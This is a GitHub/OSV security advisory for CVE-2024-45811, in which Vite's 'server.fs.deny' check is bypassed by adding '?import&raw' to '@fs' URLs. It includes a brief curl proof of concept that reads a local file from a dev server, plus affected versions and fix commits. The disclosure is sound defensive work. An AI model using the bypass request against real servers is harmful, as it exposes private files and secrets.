{"schema_version":"1.7.3","id":"GHSA-9cwx-2883-4wfx","published":"2024-09-17T18:44:12Z","modified":"2026-02-04T04:05:31.919291Z","aliases":["CVE-2024-45811"],"related":["CGA-wfwj-7mrg-m7c4"],"summary":"Vite's `server.fs.deny` is bypassed when using `?import&raw`","details":"### Summary\nThe contents of arbitrary files can be returned to the browser.\n\n### Details\n`@fs` denies access to files outside of Vite serving allow list. Adding `?import&raw` to the URL bypasses this limitation and returns the file content if it exists.\n\n### PoC\n```sh\n$ npm create vite@latest\n$ cd vite-project/\n$ npm install\n$ npm run dev\n\n$ echo \"top secret content\" > /tmp/secret.txt\n\n# expected behaviour\n$ curl \"http://localhost:5173/@fs/tmp/secret.txt\"\n\n    <body>\n      <h1>403 Restricted</h1>\n      <p>The request url &quot;/tmp/secret.txt&quot; is outside of Vite serving allow list.\n\n# security bypassed\n$ curl \"http://localhost:5173/@fs/tmp/secret.txt?import&raw\"\nexport default \"top secret content\\n\"\n//# sourceMappingURL=data:application/json;base64,eyJ2...\n```\n\n","affected":[{"package":{"name":"vite","ecosystem":"npm","purl":"pkg:npm/vite"},"ranges":[{"type":"SEMVER","events":[{"introduced":"5.4.0"},{"fixed":"5.4.6"}]}],"database_specific":{"last_known_affected_version_range":"<= 5.4.5","source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/09/GHSA-9cwx-2883-4wfx/GHSA-9cwx-2883-4wfx.json"}},{"package":{"name":"vite","ecosystem":"npm","purl":"pkg:npm/vite"},"ranges":[{"type":"SEMVER","events":[{"introduced":"5.3.0"},{"fixed":"5.3.6"}]}],"database_specific":{"last_known_affected_version_range":"<= 5.3.5","source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/09/GHSA-9cwx-2883-4wfx/GHSA-9cwx-2883-4wfx.json"}},{"package":{"name":"vite","ecosystem":"npm","purl":"pkg:npm/vite"},"ranges":[{"type":"SEMVER","events":[{"introduced":"5.2.0"},{"fixed":"5.2.14"}]}],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/09/GHSA-9cwx-2883-4wfx/GHSA-9cwx-2883-4wfx.json"}},{"package":{"name":"vite","ecosystem":"npm","purl":"pkg:npm/vite"},"ranges":[{"type":"SEMVER","events":[{"introduced":"4.0.0"},{"fixed":"4.5.4"}]}],"database_specific":{"last_known_affected_version_range":"<= 4.5.3","source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/09/GHSA-9cwx-2883-4wfx/GHSA-9cwx-2883-4wfx.json"}},{"package":{"name":"vite","ecosystem":"npm","purl":"pkg:npm/vite"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0"},{"fixed":"3.2.11"}]}],"database_specific":{"last_known_affected_version_range":"<= 3.2.10","source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/09/GHSA-9cwx-2883-4wfx/GHSA-9cwx-2883-4wfx.json"}},{"package":{"name":"vite","ecosystem":"npm","purl":"pkg:npm/vite"},"ranges":[{"type":"SEMVER","events":[{"introduced":"5.0.0"},{"fixed":"5.1.8"}]}],"database_specific":{"last_known_affected_version_range":"<= 5.1.7","source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/09/GHSA-9cwx-2883-4wfx/GHSA-9cwx-2883-4wfx.json"}}],"references":[{"type":"WEB","url":"https://github.com/vitejs/vite/security/advisories/GHSA-9cwx-2883-4wfx"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2024-45811"},{"type":"WEB","url":"https://github.com/vitejs/vite/commit/4573a6fd6f1b097fb7296a3e135e0646b996b249"},{"type":"WEB","url":"https://github.com/vitejs/vite/commit/6820bb3b9a54334f3268fc5ee1e967d2e1c0db34"},{"type":"WEB","url":"https://github.com/vitejs/vite/commit/8339d7408668686bae56eaccbfdc7b87612904bd"},{"type":"WEB","url":"https://github.com/vitejs/vite/commit/a6da45082b6e73ddfdcdcc06bb5414f976a388d6"},{"type":"WEB","url":"https://github.com/vitejs/vite/commit/b901438f99e667f76662840826eec91c8ab3b3e7"},{"type":"PACKAGE","url":"https://github.com/vitejs/vite"}],"database_specific":{"cwe_ids":["CWE-200","CWE-284"],"github_reviewed":true,"github_reviewed_at":"2024-09-17T18:44:12Z","nvd_published_at":"2024-09-17T20:15:05Z","severity":"MODERATE"},"severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"type":"CVSS_V4","score":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"}]}